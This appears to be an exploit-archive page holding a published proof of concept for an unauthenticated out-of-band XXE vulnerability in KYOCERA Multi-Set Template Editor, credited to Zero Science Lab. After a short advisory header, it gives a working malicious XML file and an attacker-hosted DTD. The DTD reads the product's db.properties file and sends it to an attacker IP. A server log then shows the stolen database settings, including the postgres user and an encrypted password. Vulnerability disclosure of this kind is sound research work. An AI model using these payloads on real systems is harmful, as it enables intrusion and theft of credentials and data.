08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
62 lines
No EOL
2.3 KiB
Text
62 lines
No EOL
2.3 KiB
Text
#Vendor: KYOCERA Corporation
|
|
#Product https://global.kyocera.com
|
|
#Affected version: 3.4.0906
|
|
#
|
|
#Summary: KYOCERA Net Admin is Kyocera's unified
|
|
#device management software that uses a web-based
|
|
#platform to give network administrators easy and
|
|
#uncomplicated control to handle a fleet for up to
|
|
#10,000 devices. Tasks that used to require multiple
|
|
#programs or walking to each printer can now be
|
|
#accomplished in a single, fast and modern environment.
|
|
#
|
|
#Desc: KYOCERA Multi-Set Template Editor (part of Net
|
|
#Admin) suffers from an unauthenticated XML External Entity
|
|
#(XXE) injection vulnerability using the DTD parameter
|
|
#entities technique resulting in disclosure and retrieval
|
|
#of arbitrary data from the affected node via out-of-band
|
|
#(OOB) channel attack. The vulnerability is triggered when
|
|
#input passed to the Multi-Set Template Editor (kmmted.exe)
|
|
#called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
|
|
#is not sanitized while parsing a 5.x Multi-Set template XML
|
|
#file.
|
|
#
|
|
#Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
# Apache Tomcat/8.5.15
|
|
#
|
|
#
|
|
#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
|
|
#
|
|
#
|
|
#
|
|
#Advisory ID: ZSL-2018-5459
|
|
#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php
|
|
#
|
|
#
|
|
#28.03.2018
|
|
#
|
|
#—
|
|
#
|
|
#
|
|
#Malicious.xml:
|
|
|
|
<?xml version="1.0" encoding="UTF-8" ?>
|
|
<!DOCTYPE ZSL [
|
|
<!ENTITY % remote SYSTEM "http://192.168.1.71:7777/xxe.xml">
|
|
%remote;
|
|
%root;
|
|
%oob;]>
|
|
|
|
|
|
Attacker's xxe.xml:
|
|
|
|
<!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties">
|
|
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> ">
|
|
|
|
|
|
Data retrieval:
|
|
|
|
lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
|
|
Serving HTTP on 0.0.0.0 port 7777 ...
|
|
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 -
|
|
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 - |